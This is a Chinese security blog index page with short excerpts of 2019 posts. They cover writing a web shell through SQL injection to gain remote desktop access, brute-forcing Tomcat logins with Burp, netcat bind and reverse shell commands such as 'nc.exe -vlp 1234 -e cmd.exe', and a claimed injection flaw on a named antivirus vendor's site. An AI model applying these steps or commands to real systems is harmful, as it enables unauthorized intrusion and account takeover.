模拟sql注入实现远程桌面登录
摘要:首先用sql注入文件命令y url+一句话 into outfile 绝对路径/test.php 用蚁剑连接打开连接的终端 先看用户的权限 创建一个用户将它放入队列中 查看3389端口是否开启 0xd3d 16进制解码为3389 打开远程桌面连接输入新建的用户和密码 成功远程桌面连接
阅读全文
posted @
2019-08-26 20:42
Lmos
阅读(673)
推荐(0)
用burp爆破tomcat的过程
摘要:首先burp抓包,将抓到的包放到intruder中 通过burp中自带的解码得知账号密码中有个“:“号 所以我们选择的数据类型为Custom iterator 第二条输入”:“ 将字典编码了对应爆破 因为爆破的时候会将字符URL编码了,所以需要将那个选项去掉 完成 爆破 这里调整可爆破MD5加密的。
阅读全文
posted @
2019-08-20 11:55
Lmos
阅读(2412)
推荐(0)
nc监控实现调用受害者cmd
摘要:正向连接 受害者 IP 是直接暴漏在公网的 或者你们同属于一个内网 受害者:nc.exe -vlp 1234 -e cmd.exe 攻击者 nc 192.168.1.1 1234 nc -lvvp 80 直接监听内网所有主机80端口 反向连接 受害者 A 出于内网状态 192.168.1.25 攻击
阅读全文
posted @
2019-08-17 13:08
Lmos
阅读(505)
推荐(0)
用php简单区别泛解析
摘要:<?php header('content-type:text/html; charset=utf-8'); $host = '58.com'; $hosts = gethostbyname('fuckfuck.'.$host) if ($hosts != 'fuckfuck.'.$host){ f
阅读全文
posted @
2019-08-14 20:24
Lmos
阅读(359)
推荐(0)
某毒霸网站存在信息泄露和sql注入
摘要:通过钟馗之眼搜索目标网站的证书使用者找到信息泄露的网站, 点击上图中的edit会跳转 手工注入sql发现有效 that's all
阅读全文
posted @
2019-08-12 17:59
Lmos
阅读(188)
推荐(0)